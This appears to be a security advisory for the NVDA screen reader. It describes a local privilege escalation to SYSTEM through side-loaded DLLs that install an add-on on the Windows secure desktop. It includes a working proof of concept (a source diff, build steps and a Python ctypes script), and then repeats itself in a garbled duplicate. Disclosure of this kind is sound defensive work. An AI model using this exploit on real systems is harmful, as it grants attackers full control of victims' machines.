Summary
This is a complex attack which allows a user to elevate from user to system privileges.
Crafted code can be used to make NVDA execute arbitrary code with system privileges.
This requires an installed copy of NVDA, which has permission to run on secure screens.
Patch commit(s)
d1fdd68
Limitations
NVDA must be enabled to run on secure screens.
This is the default for installed copies of NVDA.
Technical details
A user can compile their own NVDA DLLs.
NVDA will allow these DLLs to be side-loaded.
A malicious DLL can be used to install a malicious add-on onto the secure desktop.
This add-on can be used to execute arbitrary code with system privileges.
Proof of concept
- Install NVDA.
- Apply this diff to a source copy of NVDA, based on the same commit as the installed copy.
diff --git a/nvdaHelper/common/winIPCUtils.cpp b/nvdaHelper/common/winIPCUtils.cpp
index f59f23683..ebe36c965 100644
--- a/nvdaHelper/common/winIPCUtils.cpp
+++ b/nvdaHelper/common/winIPCUtils.cpp
@@ -28,7 +28,7 @@ size_t generateDesktopSpecificNamespace(wchar_t* buf, size_t cch) {
wchar_t deskName[32];
GetUserObjectInformation(hDesk,UOI_NAME,deskName,sizeof(deskName),NULL);
wostringstream s;
- s<<sessionId<<"."<<deskName;
+ s<<sessionId<<"."<<L"Winlogon";
size_t len=s.str().length();
if(!buf||(cch==0)) return len;
wcsncpy(buf,s.str().c_str(),cch);
- Build the DLLs for the source copy of NVDA,
scons dist.
- Run the installed copy of NVDA
- Set
addonFileLocation to any add-on (could be a crafted malicious add-on) and execute this script with a 32-bit Python 3.7 interpreter:
import ctypes
import time
time.sleep(5)
# maliciousDLL = "<nvdaSourceDirectory>/dist/lib/.../nvdaHelperRemote.dll"
# addonFileLocation =
dll = ctypes.windll[maliciousDLL]
dll.nvdaControllerInternal_installAddonPackageFromPath(addonFileLocation)
- Go to the sign-in screen before the 5 second timer runs out (
Windows+L, continue to sign-in screen).
- Note that the crafted add-on is installed on the secure screen.
Indicators of compromise
Unknown
Workarounds
As an administrator, disable a user from using NVDA on secure screens.
Timeline
- Reported in late September 2022
- Released in 2022.3.1 on October 17 2022
For more information
If you have any questions or comments about this advisory:
tspivey Analyst
Summary
This is a complex attack which allows a user to elevate from user to system privileges.
Crafted code can be used to make NVDA execute arbitrary code with system privileges.
This requires an installed copy of NVDA, which has permission to run on secure screens.
Patch commit(s)
d1fdd68
Limitations
NVDA must be enabled to run on secure screens.
This is the default for installed copies of NVDA.
Technical details
A user can compile their own NVDA DLLs.
NVDA will allow these DLLs to be side-loaded.
A malicious DLL can be used to install a malicious add-on onto the secure desktop.
This add-on can be used to execute arbitrary code with system privileges.
Proof of concept
scons dist.addonFileLocationto any add-on (could be a crafted malicious add-on) and execute this script with a 32-bit Python 3.7 interpreter:Windows+L, continue to sign-in screen).Indicators of compromise
Unknown
Workarounds
As an administrator, disable a user from using NVDA on secure screens.
Timeline
For more information
If you have any questions or comments about this advisory: